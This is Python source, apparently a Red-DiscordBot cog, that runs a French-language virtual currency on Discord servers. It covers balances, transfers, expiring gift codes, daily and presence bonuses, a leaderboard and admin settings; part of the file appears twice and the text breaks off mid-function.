acc.config["cache_daily_bonus"] != today: await self.config.member(author).config.set_raw("cache_daily_bonus", value=today) new = await self.deposit_credits(author, bonus) await self.add_log(author, "Bonus quotidien récupéré", bonus) em = discord.Embed(color=author.color, description=f"**+{bonus}** {curr} ont été ajoutés à votre compte au titre du bonus quotidien.", timestamp=ctx.message.created_at) em.set_author(name=str(author), icon_url=author.avatar_url) em.set_footer(text=f"Vous avez désormais {new} {curr}") await ctx.send(embed=em) else: await ctx.send("**Déjà récupéré** • Revenez demain pour obtenir votre bonus !") else: await ctx.send("**Désactivé** • Ce serveur n'offre pas de bonus quotidien") @commands.command(name="leaderboard", aliases=["lb"]) @commands.guild_only() @commands.cooldown(1, 10, commands.BucketType.guild) async def display_leaderboard(self, ctx, top: int = 20): """Affiche le top des membres les plus riches du serveur Vous pouvez modifier la longueur du top en précisant le paramètre *<top>*""" lbd = await self.get_guild_leaderboard(ctx.guild, top) if lbd: tbl = [] for acc in lbd: tbl.append([str(acc.user), acc.balance]) em = discord.Embed(color=await self.bot.get_embed_color(ctx.channel), description="```" + tabulate(tbl, headers=["Membre", "Solde"]) + "```",) em.set_author(name=f"🏆 Leaderboard de {ctx.guild.name}", icon_url=ctx.guild.icon_url) try: await ctx.send(embed=em) except HTTPException: await ctx.send("**Erreur** • Le top est trop grand pour être affiché, utilisez une " "valeur de <top> plus réduite") else: await ctx.send("Il n'y a aucun top à afficher.") @commands.group(name="bankset", aliases=["bset"]) @checks.admin_or_permissions(manage_messages=True) async def _bank_set(self, ctx): """Commandes de modération de la banque""" @_bank_set.command(name="monnaie", aliases=["currency"]) async def _bank_currency(self, ctx, symbole: str): """Changer le symbole utilisé pour la monnaie sur le serveur""" try: await 
self.set_currency(ctx.guild, symbole) await ctx.send(f"**Changement réalisé** • Le nouveau symbole de la monnaie sera `{symbole}`") except ValueError: await ctx.send("**Erreur** • Vous ne pouvez pas utiliser une monnaie de plus de 5 caractères de long") @_bank_set.command(name="dailybonus") async def _bank_daily_bonus(self, ctx, somme: int): """Modifier le bonus quotidien octroyé aux membres Mettre 0 désactive le bonus quotidien""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).daily_bonus.set(somme) curr = await self.get_currency(guild) if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres auront le droit à {somme} {curr} par jour") else: await ctx.send("**Bonus désactivé** • Les membres ne pourront plus demander un bonus quotidien de crédits") else: await ctx.send("**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presbonus") async def _bank_presence_bonus(self, ctx, somme: int): """Modifier le bonus de présence octroyé aux membres parlant sur les salons (par unité de temps) Mettre 0 désactive ce bonus""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).presence_bonus.set(somme) curr = await self.get_currency(guild) delay = await self.config.guild(guild).presence_delay() if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres recevront {somme} {curr} toutes les {delay} secondes") else: await ctx.send( "**Bonus désactivé** • Les membres ne recevront plus de crédits lorsqu'ils discutent") else: await ctx.send( "**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presdelay") async def _bank_presence_delay(self, ctx, secondes: int = 600): """Modifier le délai en secondes entre deux bonus de présence (par def. 
600s = 10m)""" guild = ctx.guild if secondes >= 60: await self.config.guild(guild).presence_delay.set(secondes) curr = await self.get_currency(guild) bonus = await self.config.guild(guild).presence_bonus() await ctx.send( f"**Délai modifié** • Les membres recevront {bonus} {curr} toutes les {secondes} secondes") else: await ctx.send( "**Invalide** • Le délai doit être supérieur à 60s") @_bank_set.command(name="edit") async def _bank_edit_account(self, ctx, user: discord.Member, value: int = None): """Modifie le solde d'un compte de membre Ne rien mettre affiche le solde actuel du membre""" acc = await self.get_account(user) curr = await self.get_currency(user.guild) if value: try: solde = await self.set_balance(user, value) await ctx.send(f"**Succès** • Le solde de {user.mention} est désormais de **{solde}** {curr}") except ValueError: await ctx.send("**Erreur** • Le solde d'un membre ne peut être négatif") else: await ctx.send(f"**Info** • Le solde de {str(user)} est de **{humanize_number(acc.balance)}** {curr}") @_bank_set.command(name="resetuser") async def _bank_reset_account(self, ctx, user: discord.Member): """Reset les données bancaires d'un membre (cache compris)""" await self.config.member(user).clear() await ctx.send(f"**Succès** • Le compte de {user.mention} a été réinitialisé") @_bank_set.command(name="resetcache") async def _bank_reset_account_cache(self, ctx, user: discord.Member): """Reset seulement les données du cache du compte bancaire du membre Cela réinitialise les délais des bonus""" await self.config.member(user).config.clear_raw("cache_daily_bonus") await self.config.member(user).config.clear_raw("cache_presence_bonus") await ctx.send(f"**Succès** • Le cache du compte de {user.mention} a été réinitialisé") # Bonus de présence ---------------------v async def manage_presence_bonus(self, member: discord.Member) -> Union[int, bool]: """Gère l'ajout auto. 
des bonus de présence sur les serveurs ayant activé l'option Renvoie le nouveau solde du membre s'il est modifié, sinon False""" if member.bot: raise UnauthorizedMember("Un bot ne peut pas toucher les bonus de présence") guild = member.guild conf = await self.config.guild(guild).all() if conf["presence_bonus"]: acc = await self.get_account(member) if acc.config["cache_presence_bonus"] + conf["presence_delay"] < time.time(): await self.config.member(member).config.set_raw("cache_presence_bonus", value=time.time()) return await self.deposit_credits(member, conf["presence_bonus"]) return False @commands.Cog.listener() async def on_message(self, message): if message.guild: if not message.author.bot: await self.manage_presence_bonus(message.author) @commands.Cog.listener() async def on_reaction_add(self, reaction, author): if reaction.message.guild: if not author.bot: await self.manage_presence_bonus(author) async def red_delete_data_for_user( self, *, requester: Literal["discord", "owner", "user", "user_strict"], user_id: int ): await self.config.user_from_id(user_id).clear() all_members = await self.config.all_members() async for guild_id, guild_data in AsyncIter(all_members.items(), steps=100): if user_id in guild_data: await self.config.member_from_ids(guild_id, user_id).clear()
cash/cash.py
import asyncio import logging import random import re import string import time from copy import copy from datetime import datetime, timedelta import discord from discord.errors import HTTPException from typing import Union, List, Tuple, Literal from redbot.core import Config, commands, checks from redbot.core.utils import AsyncIter from redbot.core.utils.menus import start_adding_reactions from redbot.core.utils.chat_formatting import box, humanize_number, humanize_timedelta from tabulate import tabulate logger = logging.getLogger("red.AwsmCogs.cash") class CashError(Exception): """Classe de base pour les erreurs Cash""" class BalanceTooHigh(CashError): """Soulevée lorsque le balance dépasse le seuil fixé""" class UnauthorizedMember(CashError): """Soulevée lorsqu'un membre n'est pas autorisé à réaliser une action""" class UserNotFound(CashError): """Soulevée lorsqu'un membre n'est pas retrouvé sur le serveur""" class UnknownGiftCode(CashError): """Soulevée lorsque le code cadeau donné n'existe pas""" class GiftCodeExpired(CashError): """Soulevée lorsqu'un code cadeau vient d'expirer""" def _invalid_amount(value: int) -> bool: return value < 0 class Account: def __init__(self, user: discord.Member, balance: int, logs: list, config: dict): self.user = user self.guild = user.guild self.balance = balance self.logs = logs self.config = config def __str__(self): return self.user.mention def __int__(self): return self.balance class Log: def __init__(self, user: discord.Member, text: str, timestamp: int, delta: int): self.user = user self.guild = user.guild self.text = text self.timestamp = timestamp self.delta = delta def __str__(self): return self.text def __int__(self): return self.timestamp class GiftCode: def __init__(self, code: str, author: discord.Member, expire: int, value: int): self.code = code self.author, self.guild = author, author.guild self.expire = expire self.value = value def __str__(self): return self.code def __int__(self): return self.value class 
Cash(commands.Cog): """Economie virtuelle et jeux utilisant celle-ci""" def __init__(self, bot): super().__init__() self.bot = bot self.config = Config.get_conf(self, identifier=736144321857978388, force_registration=True) default_member = {"balance": 0, "logs": [], "config": {"day_delta": [None, 0], "cache_daily_bonus": '', "cache_presence_bonus": 0} } default_guild = {"currency": "Ꞥ", "daily_bonus": 100, "presence_bonus": 0, "presence_delay": 600, "gift_codes": {}} default_global = {"max_balance": 10**9, "max_logs_length": 3} self.config.register_member(**default_member) self.config.register_guild(**default_guild) self.config.register_global(**default_global) async def get_currency(self, guild: discord.Guild) -> str: """Obtenir le symbole de la monnaie du serveur""" return await self.config.guild(guild).currency() async def set_currency(self, guild: discord.Guild, symbol: str) -> str: """Modifie le symbole de la monnaie du serveur Renvoie le nouveau symbole attribué""" if not isinstance(symbol, str): raise TypeError("Type du symbole invalide, {} != str".format(type(symbol))) if len(symbol) > 5: raise ValueError("Le symbole de la monnaie ne peut pas faire plus de 5 caractères de long") await self.config.guild(guild).currency.set(symbol) return symbol async def get_account(self, member: discord.Member) -> Account: """Obtenir l'objet Account du membre demandé""" userdata = await self.config.member(member).all() return Account(member, **userdata) async def get_balance(self, member: discord.Member) -> int: """Renvoie la valeur actuelle du solde d'un membre""" account = await self.get_account(member) return account.balance async def enough_balance(self, member: discord.Member, cost: int) -> bool: """Vérifie si le membre possède assez de fonds pour une dépense""" if not isinstance(cost, int): raise TypeError("Type de la dépense invalide, {} != int".format(type(cost))) if _invalid_amount(cost): return False return await self.get_balance(member) >= cost async def 
set_balance(self, member: discord.Member, value: int) -> int: """Modifier le solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if value < 0: raise ValueError("Le solde ne peut être négatif") max_balance = await self.config.max_balance() if value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits") oldvalue = await self.config.member(member).balance() await self.edit_delta(member, value - oldvalue) await self.config.member(member).balance.set(value) return value async def deposit_credits(self, member: discord.Member, value: int) -> int: """Ajouter des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de dépôt invalide, {value} < 0") current = await self.get_balance(member) return await self.set_balance(member, current + value) async def remove_credits(self, member: discord.Member, value: int) -> int: """Retirer des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type de retrait invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de retrait invalide, {value} < 0") current = await self.get_balance(member) if value > current: raise ValueError(f"Fonds insuffisants, {value} > {current}") return await self.set_balance(member, current - value) async def transfert_credits(self, from_: discord.Member, to_: discord.Member, value: int) -> Tuple[Account, Account]: """Transfère des crédits d'un membre à un autre Renvoie un tuple contenant les comptes des deux membres""" if not isinstance(value, int): raise TypeError("Type du transfert invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur du 
transfert invalide, {value} < 0") max_balance = await self.config.max_balance() if await self.get_balance(to_) + value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits lors d'une " f"transaction") await self.remove_credits(from_, value) await self.deposit_credits(to_, value) return await self.get_account(from_), await self.get_account(to_) async def gen_gcode(self, guild: discord.Guild) -> str: """Génère un code unique au format $XX-YYY pour les codes cadeaux Cap. max. théorique = 52 521 875 codes uniques""" current_codes = await self.config.guild(guild).gift_codes() r = lambda long: ''.join(random.choices(string.ascii_uppercase + string.digits, k=long)) code = f"${r(2)}-{r(3)}" while code in current_codes: code = f"${r(2)}-{r(3)}" return code async def new_gift_code(self, from_: discord.Member, value: int, timestamp: int) -> str: """Génère un nouveau code cadeau contenant une certaine somme Le code est valide seulement sur le serveur du membre ayant généré le code Renvoie le code généré""" if not isinstance(value, int): raise TypeError("Type de valeur invalide, {} != int".format(type(value))) if not isinstance(timestamp, int): raise TypeError("Type du timestamp d'expiration invalide, {} != int".format(type(timestamp))) if value < 0: raise ValueError("La valeur de crédits contenus dans le code doit être positif") if timestamp < 0: raise ValueError("La valeur de l'expiration doit être positive ou nulle") guild = from_.guild code = await self.gen_gcode(guild) current = await self.config.guild(guild).gift_codes() current[code] = {"value": value, "expire": timestamp, "author": from_.id} await self.config.guild(guild).gift_codes.set(current) return code async def fetch_gift_code(self, code: str, ref_user: discord.Member = None) -> Union[GiftCode, None]: """Retrouve automatiquement le serveur d'un code et renvoie celui-ci si trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Type du code 
invalide, {} != str".format(type(code))) all_guilds = await self.config.all_guilds() for guildid in all_guilds: if code in all_guilds[guildid]["gift_codes"]: guild = self.bot.get_guild(guildid) if guild: if ref_user is not None and ref_user in guild.members: return await self.get_gift_code(guild, code) else: return await self.get_gift_code(guild, code) return None async def get_gift_code(self, guild: discord.Guild, code: str) -> Union[GiftCode, None]: """Renvoie un objet *GiftCode* s'il est trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Le code est invalide, {} != str".format(type(code))) codes = await self.config.guild(guild).gift_codes() if code in codes: c = codes[code] if time.time() > c["expire"]: del codes[code] await self.config.guild(guild).gift_codes.set(codes) raise GiftCodeExpired(f"Le code cadeau {code} vient d'expirer") user = guild.get_member(c["author"]) if not user: raise UserNotFound(f"Le membre avec l'ID {c['author']} est introuvable") return GiftCode(author=user, value=c["value"], code=code, expire=c["expire"]) return None async def use_gift_code(self, user: discord.Member, code: str) -> Union[int, bool]: """Utilise un code et renvoie la valeur qu'il contenait si le membre générateur possède suffisamment de fonds, sinon renvoie False""" gift = await self.get_gift_code(user.guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={user.guild.id}") if not await self.enough_balance(user, gift.value): return False await self.transfert_credits(gift.author, user, gift.value) return await self.remove_gift_code(user.guild, code) async def remove_gift_code(self, guild: discord.Guild, code: str) -> int: """Supprime le code et renvoie la valeur contenue dans celui-ci""" try: gift = await self.get_gift_code(guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={guild.id}") await self.config.guild(guild).gift_codes.clear_raw(code) return gift.value 
except: raise ValueError(f"Le code cadeau {code} n'est pas valide") async def get_delta(self, member: discord.Member, yield_date: bool = False) -> Union[int, list]: """Renvoie la valeur et date du delta total des opérations du membre""" acc = await self.get_account(member) delta = acc.config["day_delta"] return delta[1] if not yield_date else delta async def edit_delta(self, member: discord.Member, value: int) -> int: """Modifie la valeur du delta des opérations du jour Renvoie la nouvelle valeur du delta""" if not isinstance(value, int): raise TypeError("Type de la valeur du delta invalide, {} != int".format(type(value))) date, delta = await self.get_delta(member, True) today = datetime.now().strftime("%Y.%m.%d") if date != today: delta = 0 await self.config.member(member).config.set_raw("day_delta", value=[today, delta + value]) return delta + value async def get_log(self, member: discord.Member, timestamp: int) -> Union[Log, None]: """Renvoie le (1er) log du membre correspondant au timestamp fourni si trouvé, sinon None""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp invalide, {} != int".format(type(timestamp))) acc = await self.get_account(member) for log in acc.logs: if log["timestamp"] == timestamp: return Log(**log) return None async def get_member_logs(self, member: discord.Member) -> Union[List[Log], list]: """Renvoie tous les logs (sous forme d'objets Log) d'un membre Renvoie une liste vide si aucun log n'est présent""" acc = await self.get_account(member) all_logs = [] if acc.logs: for log in acc.logs: all_logs.append(Log(member, **log)) return all_logs async def add_log(self, member: discord.Member, text: str, delta: int) -> list: """Ajoute un log au membre visé Renvoie le nouvel état des logs""" if not isinstance(text, str): raise TypeError("Type du contenu du log invalide, {} != str".format(type(text))) if not isinstance(delta, int): raise TypeError("Type de somme du log invalide, {} != int".format(type(delta))) added = 
{"text": text, "timestamp": int(time.time()), "delta": delta} acc = await self.get_account(member) logs = acc.logs max_logs_length = await self.config.max_logs_length() if len(logs) >= max_logs_length: logs = logs[-(max_logs_length - 1):] logs.append(added) await self.config.member(member).logs.set(logs) return logs async def delete_log(self, member: discord.Member, timestamp: int) -> list: """Retire un log (ou plusieurs s'ils ont un timestamp identique) au membre visé Typiquement optionnel, les logs étant remplacés au fur et à mesure des ajouts Renvoie le nouvel état des logs""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp du log invalide, {} != int".format(type(timestamp))) if not await self.get_log(member, timestamp): raise ValueError(f"Log avec le timestamp {timestamp} pour USERID={member.id} introuvable") acc = await self.get_account(member) logs = acc.logs new = copy(logs) for log in logs: if log["timestamp"] == timestamp: new.remove(log) await self.config.member(member).logs.set(new) return new async def wipe_logs(self, member: discord.Member) -> None: """Supprime tous les logs d'un membre""" await self.config.member(member).clear_raw("logs") async def wipe_guild(self, guild: discord.Guild) -> None: """Supprime les données bancaires des membres d'un serveur""" await self.config.clear_all_members(guild) async def wipe_account(self, member: discord.Member) -> None: """Supprime les données bancaires d'un membre""" await self.config.member(member).clear() async def raw_delete_account(self, user_id: int, guild: discord.Guild) -> None: """Supprime un compte bancaire par ID du membre""" await self.config.member_from_ids(guild.id, user_id).clear() async def get_max_balance(self) -> int: """Renvoie la valeur maximale que peut atteindre un solde de membre (sur n'importe quel serveur)""" return self.config.max_balance() async def set_max_balance(self, value: int) -> None: """Modifie la valeur maximale qu'un solde de membre peut atteindre""" if 
not isinstance(value, int): raise TypeError("Type de la valeur maximale invalide, {} != int".format(type(value))) if value <= 0: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_balance.set(value) async def get_max_logs_length(self) -> int: """Renvoie le nombre maximal de logs pouvant être stockés dans les données bancaires d'un membre""" return self.config.max_logs_length() async def set_max_logs_length(self, length: int) -> None: """Modifie le nombre de logs stockés pour un membre""" if not isinstance(length, int): raise TypeError("Type de la longueur maximale invalide, {} != int".format(type(length))) if length < 1: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_logs_length.set(length) async def get_guild_leaderboard(self, guild: discord.Guild, cutoff: int = None) -> Union[list, List[Account]]: """Renvoie le top des membres les plus riches du serveur (liste d'objets Account) Renvoie une liste vide si aucun top n'est générable""" users = await self.config.all_members(guild) sorted_users = sorted(list(users.items()), key=lambda u: u[1]["balance"], reverse=True) top = [] for uid, acc in sorted_users: user = guild.get_member(uid) if user: top.append(Account(user, **acc)) return top[:cutoff] if cutoff else top async def get_leaderboard_position_for(self, member: discord.Member) -> int: """Renvoie la position du membre dans le classement de son serveur Renvoie la dernière place du classement si le membre n'est pas trouvé""" top = await self.get_guild_leaderboard(member.guild) for acc in top: if acc.user == member: return top.index(acc) + 1 return len(top) async def utils_parse_timedelta(self, time_string: str) -> timedelta: """Renvoie un objet *timedelta* à partir d'un str contenant des informations de durée (Xj Xh Xm Xs)""" if not isinstance(time_string, str): raise TypeError("Le texte à parser est invalide, {} != str".format(type(time_string))) regex = 
re.compile('^((?P<days>[\\.\\d]+?)j)? *((?P<hours>[\\.\\d]+?)h)? *((?P<minutes>[\\.\\d]+?)m)? *((?P<seconds>[\\.\\d]+?)s)? *$') sch = regex.match(time_string) if not sch: raise ValueError("Aucun timedelta n'a pu être déterminé des valeurs fournies") parsed = sch.groupdict() return timedelta(**{i: int(parsed[i]) for i in parsed if parsed[i]}) # Commandes -----------------------v @commands.group(name="bank", aliases=["b"], invoke_without_command=True) async def _bank_actions(self, ctx, user: discord.Member = None): """Commandes de gestion du compte bancaire virtuel *Cash*""" if ctx.invoked_subcommand is None: return await ctx.invoke(self.show_bank, user=user) @_bank_actions.command(name="show") @commands.guild_only() async def show_bank(self, ctx, user: discord.Member = None): """Afficher les infos de son compte""" user = user if user else ctx.message.author acc = await self.get_account(user) curr = await self.get_currency(ctx.guild) hum_balance = humanize_number(acc.balance) em = discord.Embed(color=user.color, timestamp=ctx.message.created_at) em.set_author(name="Compte de " + str(user), icon_url=user.avatar_url) em.add_field(name="💰 Solde", value=box(f"{hum_balance} {curr}")) delta = await self.get_delta(user) delta_emoji = "📉" if delta < 0 else "📈" em.add_field(name=f"{delta_emoji} Variation", value=box(f"{delta:+}")) top = await self.get_leaderboard_position_for(user) em.add_field(name="🏅 Position", value=box(f"#{top}")) logs = await self.get_member_logs(user) if logs: txt = "\n".join([f"{log.delta:+} · {log.text[:50]}" for log in logs][::-1]) em.add_field(name="📃 Historique", value=txt) await ctx.send(embed=em) @_bank_actions.command(name="give") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_give(self, ctx, receveur: discord.Member, somme: int): """Transférer de l'argent à un receveur tiers""" try: await self.transfert_credits(ctx.author, receveur, int(somme)) curr = await self.get_currency(ctx.guild) await 
ctx.send(f"**Transfert réalisé** • {receveur.mention} a reçu **{somme}** {curr}") except ValueError: return await ctx.send("**Impossible** • Vous ne pouvez pas transférer une somme nulle ou négative") except BalanceTooHigh: plaf = humanize_number(await self.config.max_balance()) return await ctx.send(f"**Limite atteinte** • {receveur.mention} ne peut pas recevoir cette somme car " f"il dépasserait le plafond fixé de {plaf}") await self.add_log(ctx.author, f"Transfert d'argent à {receveur.name}", -somme) await self.add_log(receveur, f"Reception d'argent de {ctx.author.name}", somme) @_bank_actions.command(name="gift") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_gift(self, ctx, somme: int, expire: str = "24h"): """Générer un code cadeau contenant des crédits (retrait différé) Le retrait de crédits sur le compte du membre générateur n'est pas immédiat et l'utilisation du code sera impossible en cas de manque de fonds Par défaut les codes expirent au bout de 24h, vous pouvez modifier cela avec le paramètre *<expire>* en utilisant le format `\"Xj Xh Xm Xs\"`""" user = ctx.author if somme < 1: return await ctx.send( "**Erreur** • La valeur doit être positive (sup. 
à 0)") try: tdelta = await self.utils_parse_timedelta(expire) except ValueError: return await ctx.send("**Erreur** • Le temps d'expiration n'est pas valide, utilisez le format `\"Xj Xh Xm Xs\"`") if await self.enough_balance(user, somme): timestamp = (datetime.now() + tdelta).timestamp() curr = await self.get_currency(ctx.guild) em = discord.Embed(title=f"**Nouveau code-cadeau** · {somme} {curr}", description="**En cours de génération...**") em.add_field(name="Information", value="Un membre peut utiliser ce code avec `b open`\n" "Vous serez débité de la valeur du code lors de son utilisation\n" "L'expiration du code rend impossible son utilisation, pour " "détruire le code avant sa date d'expiration utilisez-le vous-même.") em.set_footer(text="Ce code expirera dans {}".format(humanize_timedelta(timedelta=tdelta))) try: dm = await user.send(embed=em) except: return await ctx.send("**Erreur** • Je ne peux pas générer de code si vous ne me permettez pas de vous envoyer un MP") try: code = await self.new_gift_code(user, somme, int(timestamp)) await asyncio.sleep(1) em.description = box(code) em.colour = user.color await dm.edit(embed=em) except ValueError as e: await ctx.send( f"**Erreur** • La génération du code n'a pas pu se faire en raison d'un problème dans les valeurs fournies : `{e}`") em.description = box("Erreur dans la génération du code") await dm.edit(embed=em) else: await ctx.send( "**Impossible** • Même si le retrait n'est pas immédiat, vous devez avoir la somme sur votre compte préalablement à la génération d'un code") @_bank_actions.command(name="open") async def bank_open_gift(self, ctx, code: str): """Utiliser un code-cadeau et obtenir son contenu Les codes ne fonctionnent que sur le serveur où ils ont été générés""" code = code.upper().strip() try: if ctx.guild: gift = await self.get_gift_code(ctx.guild, code) else: gift = await self.fetch_gift_code(code) except ValueError: return await ctx.send("**Invalide** • Le code fourni est invalide, vérifiez-le 
et réessayez") except GiftCodeExpired: return await ctx.send("**Expiré** • Le code fourni a expiré, consultez le générateur du code pour en obtenir un nouveau") if gift: guild = gift.guild curr = await self.get_currency(guild) hum_value = humanize_number(gift.value) content = f"{hum_value} {curr}" em = discord.Embed(title=f"**Code-cadeau** · {code}", description="Voulez-vous échanger le code contre son contenu ?") em.add_field(name="Contenu", value=box(content)) em.set_footer(text="🎁 Accepter | ❌ Refuser") emojis = ["🎁", "❌"] msg = await ctx.send(embed=em) start_adding_reactions(msg, emojis) try: react, user = await self.bot.wait_for("reaction_add", check=lambda r, u: u == ctx.author and r.message.id == msg.id, timeout=20) except asyncio.TimeoutError: await msg.delete() return else: emoji = react.emoji await msg.delete() if emoji == "🎁": if await self.enough_balance(gift.author, gift.value): try: await self.use_gift_code(ctx.author, code) except Exception as e: logger.error(e, exc_info=True) return await ctx.send("Erreur de transfert de fonds : `{}`".format(str(e).replace('\"', ''))) await self.add_log(ctx.author, "Utilisation d'un code-cadeau", gift.value) await self.add_log(gift.author, "Débit du code cadeau utilisé", -gift.value) await ctx.send(f"**Utilisation réussie** • **{humanize_number(gift.value)}** {curr} ont été " f"transférés sur votre compte.") else: await ctx.send(f"**Fonds insuffisants** • L'auteur du code ({str(gift.author)}) n'a plus les " f"fonds suffisants pour assumer la valeur de ce code") else: await ctx.send(f"**Code invalide** • Le code est invalide ou celui-ci a peut-être expiré") @commands.command(name="bonus") @commands.guild_only() async def cash_bonus(self, ctx): """Recevoir son bonus quotidien de crédits""" author = ctx.author today = datetime.now().strftime("%Y.%m.%d") acc = await self.get_account(author) curr = await self.get_currency(ctx.guild) bonus = await self.config.guild(ctx.guild).daily_bonus() if bonus: if 
acc.config["cache_daily_bonus"] != today: await self.config.member(author).config.set_raw("cache_daily_bonus", value=today) new = await self.deposit_credits(author, bonus) await self.add_log(author, "Bonus quotidien récupéré", bonus) em = discord.Embed(color=author.color, description=f"**+{bonus}** {curr} ont été ajoutés à votre compte au titre du bonus quotidien.", timestamp=ctx.message.created_at) em.set_author(name=str(author), icon_url=author.avatar_url) em.set_footer(text=f"Vous avez désormais {new} {curr}") await ctx.send(embed=em) else: await ctx.send("**Déjà récupéré** • Revenez demain pour obtenir votre bonus !") else: await ctx.send("**Désactivé** • Ce serveur n'offre pas de bonus quotidien") @commands.command(name="leaderboard", aliases=["lb"]) @commands.guild_only() @commands.cooldown(1, 10, commands.BucketType.guild) async def display_leaderboard(self, ctx, top: int = 20): """Affiche le top des membres les plus riches du serveur Vous pouvez modifier la longueur du top en précisant le paramètre *<top>*""" lbd = await self.get_guild_leaderboard(ctx.guild, top) if lbd: tbl = [] for acc in lbd: tbl.append([str(acc.user), acc.balance]) em = discord.Embed(color=await self.bot.get_embed_color(ctx.channel), description="```" + tabulate(tbl, headers=["Membre", "Solde"]) + "```",) em.set_author(name=f"🏆 Leaderboard de {ctx.guild.name}", icon_url=ctx.guild.icon_url) try: await ctx.send(embed=em) except HTTPException: await ctx.send("**Erreur** • Le top est trop grand pour être affiché, utilisez une " "valeur de <top> plus réduite") else: await ctx.send("Il n'y a aucun top à afficher.") @commands.group(name="bankset", aliases=["bset"]) @checks.admin_or_permissions(manage_messages=True) async def _bank_set(self, ctx): """Commandes de modération de la banque""" @_bank_set.command(name="monnaie", aliases=["currency"]) async def _bank_currency(self, ctx, symbole: str): """Changer le symbole utilisé pour la monnaie sur le serveur""" try: await 
self.set_currency(ctx.guild, symbole) await ctx.send(f"**Changement réalisé** • Le nouveau symbole de la monnaie sera `{symbole}`") except ValueError: await ctx.send("**Erreur** • Vous ne pouvez pas utiliser une monnaie de plus de 5 caractères de long") @_bank_set.command(name="dailybonus") async def _bank_daily_bonus(self, ctx, somme: int): """Modifier le bonus quotidien octroyé aux membres Mettre 0 désactive le bonus quotidien""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).daily_bonus.set(somme) curr = await self.get_currency(guild) if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres auront le droit à {somme} {curr} par jour") else: await ctx.send("**Bonus désactivé** • Les membres ne pourront plus demander un bonus quotidien de crédits") else: await ctx.send("**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presbonus") async def _bank_presence_bonus(self, ctx, somme: int): """Modifier le bonus de présence octroyé aux membres parlant sur les salons (par unité de temps) Mettre 0 désactive ce bonus""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).presence_bonus.set(somme) curr = await self.get_currency(guild) delay = await self.config.guild(guild).presence_delay() if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres recevront {somme} {curr} toutes les {delay} secondes") else: await ctx.send( "**Bonus désactivé** • Les membres ne recevront plus de crédits lorsqu'ils discutent") else: await ctx.send( "**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presdelay") async def _bank_presence_delay(self, ctx, secondes: int = 600): """Modifier le délai en secondes entre deux bonus de présence (par def. 
600s = 10m)""" guild = ctx.guild if secondes >= 60: await self.config.guild(guild).presence_delay.set(secondes) curr = await self.get_currency(guild) bonus = await self.config.guild(guild).presence_bonus() await ctx.send( f"**Délai modifié** • Les membres recevront {bonus} {curr} toutes les {secondes} secondes") else: await ctx.send( "**Invalide** • Le délai doit être supérieur à 60s") @_bank_set.command(name="edit") async def _bank_edit_account(self, ctx, user: discord.Member, value: int = None): """Modifie le solde d'un compte de membre Ne rien mettre affiche le solde actuel du membre""" acc = await self.get_account(user) curr = await self.get_currency(user.guild) if value: try: solde = await self.set_balance(user, value) await ctx.send(f"**Succès** • Le solde de {user.mention} est désormais de **{solde}** {curr}") except ValueError: await ctx.send("**Erreur** • Le solde d'un membre ne peut être négatif") else: await ctx.send(f"**Info** • Le solde de {str(user)} est de **{humanize_number(acc.balance)}** {curr}") @_bank_set.command(name="resetuser") async def _bank_reset_account(self, ctx, user: discord.Member): """Reset les données bancaires d'un membre (cache compris)""" await self.config.member(user).clear() await ctx.send(f"**Succès** • Le compte de {user.mention} a été réinitialisé") @_bank_set.command(name="resetcache") async def _bank_reset_account_cache(self, ctx, user: discord.Member): """Reset seulement les données du cache du compte bancaire du membre Cela réinitialise les délais des bonus""" await self.config.member(user).config.clear_raw("cache_daily_bonus") await self.config.member(user).config.clear_raw("cache_presence_bonus") await ctx.send(f"**Succès** • Le cache du compte de {user.mention} a été réinitialisé") # Bonus de présence ---------------------v async def manage_presence_bonus(self, member: discord.Member) -> Union[int, bool]: """Gère l'ajout auto. 
